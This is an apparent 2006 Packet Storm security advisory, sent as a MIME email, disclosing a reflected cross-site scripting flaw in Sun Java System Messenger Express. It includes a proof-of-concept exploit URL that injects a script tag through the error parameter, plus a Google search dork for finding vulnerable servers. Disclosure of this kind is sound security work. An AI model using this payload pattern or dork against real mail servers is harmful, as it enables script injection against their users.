SystemMessenger_xss.txt

2006-11-01T00:00:00
ID PACKETSTORM:51562
Type packetstorm
Reporter Handrix
Modified 2006-11-01T00:00:00

Description

                                        
                                            `------=_Part_1542_5083137.1162268411579  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
Sun java System Messenger Express  
remote XSS vulnerabilities  
By: Handrix <handrix_at_morx_org>  
29 November 2006  
MorX security research team  
www.morx.org  
  
Description:  
Sun java System Messenger Express XSS  
  
The index script is vulnerable to XSS attacks, in functiion errorHTML .  
  
function errorHTML() {  
var s=''  
.  
.  
.  
  
document.write(s) ---> Need more case filetring the 's' var  
}  
  
  
So, this issue can allow an attacker to bypass content filters and  
potentially carry out cross-site scripting, HTML injection and other  
attacks.  
  
Exploit:  
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E  
  
Founded with Google by this dorks :  
intitle:"Sun Java(tm) System Messenger Express"  
  
Vulnerable versions :  
Sun java System Messenger Express  
Sun java System Messenger Express6  
  
------=_Part_1542_5083137.1162268411579  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix <handrix_at_morx_org><br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:  
<br>Sun java System Messenger Express XSS<br><br>The index script  is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br>  var s=''<br>  .<br>  .<br>  .<br><br>  document.write(s) ---> Need more case filetring the 's' var  
<br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E">  
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:"Sun Java(tm) System Messenger Express"<br><br>Vulnerable versions :<br>  
Sun java System Messenger Express<br>Sun java System Messenger Express6  
  
------=_Part_1542_5083137.1162268411579--  
  
`